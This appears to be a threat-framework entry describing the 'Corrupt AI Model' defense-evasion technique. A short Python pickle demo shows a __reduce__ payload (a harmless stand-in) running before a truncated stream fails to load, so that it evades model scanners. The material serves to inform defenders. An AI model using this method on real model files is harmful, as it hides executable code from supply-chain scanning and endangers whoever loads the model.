Corrupt AI Model
Type: technique
Description: An adversary may deliberately corrupt a malicious AI model file so that it cannot be fully deserialized, evading detection by model scanners that rely on successful deserialization. The corrupted model may still execute malicious code before deserialization fails.
Version: 0.1.0
Created At: 2025-12-22 07:58:23 -0500
Last Modified At: 2025-12-22 07:58:23 -0500
External References
Related Objects
- --> Defense Evasion (tactic): An adversary can corrupt a malicious AI model file so that it cannot be fully deserialized, evading detection by a model scanner.
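A minimal sketch of the behavior described above, using Python's pickle format (a common AI model serialization format). All names here are illustrative, and the payload is a harmless stand-in: a pickle stream executes its embedded callable when the REDUCE opcode is processed, so truncating the trailing STOP opcode makes loading fail only after the payload has already run.

```python
import pickle

executed = []  # records the side effect of the stand-in "payload"

def payload(msg):
    # Harmless stand-in for malicious code that runs during deserialization.
    executed.append(msg)

class Malicious:
    # __reduce__ instructs pickle to call payload("code ran") at load time.
    def __reduce__(self):
        return (payload, ("code ran",))

# Serialize the model, then "corrupt" it by dropping the final STOP opcode byte.
blob = pickle.dumps(Malicious(), protocol=2)
corrupted = blob[:-1]

failed = False
try:
    pickle.loads(corrupted)   # a scanner relying on a full load would error out here
except Exception:
    failed = True             # deserialization fails...

print("deserialization failed:", failed)
print("payload ran first:", executed)  # ...but the payload already executed
```

Because the callable embedded via `__reduce__` is invoked while the opcode stream is still being processed, the side effect lands before the truncated stream raises an error, which is why a scanner that treats an unloadable file as benign can be evaded this way.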